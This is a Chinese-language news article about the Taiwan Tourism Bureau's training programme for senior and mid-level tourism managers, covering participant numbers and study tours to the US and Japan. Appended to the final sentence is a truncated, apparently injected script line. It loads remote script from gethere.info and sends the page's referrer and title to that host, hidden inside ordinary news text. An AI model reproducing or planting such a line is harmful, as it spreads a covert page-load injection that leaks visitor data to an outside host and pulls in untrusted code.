交通部觀光局針對中高階主管為培訓對象的「觀光產業關鍵人才培育計畫」,以人才優化為目標,提升觀光產業人才素質並接軌國際。今年經過選訓參加高階主管養成的學員有69位,中階主管培訓亦達667人次,總計300家國內觀光企業及大專院校投入,超過10,000小時的學習總時數,累計73套個案教材及編撰3套關鍵人才教案。透過系統化發展性的人才培育訓練,提升觀光產業接待國際旅客的服務品質及國際競爭力。

交通部觀光局表示,在高階主管養成部分,先在台灣由國內EMBA商管學院師資進行管理核心課程,學習創新創意、策略、行銷、領導統御、財務分析及經濟趨勢觀察,精進企業經營管理能力;再分別依旅行業、旅館業及觀光遊樂業不同產業特性及需求進行主題模組課程。

國內訓練課程後,觀光遊樂業赴美國加州洛杉磯及聖地牙哥觀摩6大主題樂園行銷策略、園區主題活動規劃之創意;旅館業及觀光旅館業赴美國拉斯維加斯及洛杉磯參訪國際五星酒店及特色旅館之品牌行銷及會展經營管理;旅行業則赴日本觀摩東京H.I.S.旅行社及樂天旅行社創新行銷、服務品質及電子商務,並安排與國外參訪單位高階主管進行座談以深入瞭解經營或服務理念與作為,並由產學專家扮演導師引導參訪,剖析實務及深入觀察,融合及應用國內外管理知識與實務,產生質變效果。

百威旅遊副總經理俞示芬指出,H.I.S.旅行社的行銷溝通工具多元、多樣,但均傳遞一致性品牌訊息;樂天旅遊沒有自己的產品,但所建立的網路銷售平台,無不滲入並成為顧客生活的一部分,形成樂天集團經濟體,創造日本旅行業的變革。讓她重新思考品牌建構的價值與意義。此外,她提到旅行業應不僅是提供旅行產品,更是扮演推動地方產業發展的角色。

台南老爺行旅總經理唐伯川則表示,以往拉斯維加斯的旅館收入主要來自於賭場,近年大型會議展覽市場需求攀升,連帶地拉抬住房、餐飲、交通等相關產業,住房收入已逐漸高於賭場收入,許多旅館更紛紛以增加會展空間為優先進行裝修。而為了呈現差異化及增加顧客黏著度,各旅館的營運策略在軟硬體方向強調科技創新應用及User Experience,為了吸引不同的客群而建置相關娛樂設施,目的都是希望顧客有不同的體驗。在內部行銷的部分,他們強調Family概念,例如感謝員工日、激勵員工週,藉以提升員工對工作的滿意度及對公司的認同,以提升服務品質,是非常值得台灣業者學習。

交通部觀光局明年將持續辦理「觀光產業關鍵人才培育計畫」,期望有更多的觀光業者參與,共同提升觀光產業競爭力。s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + “;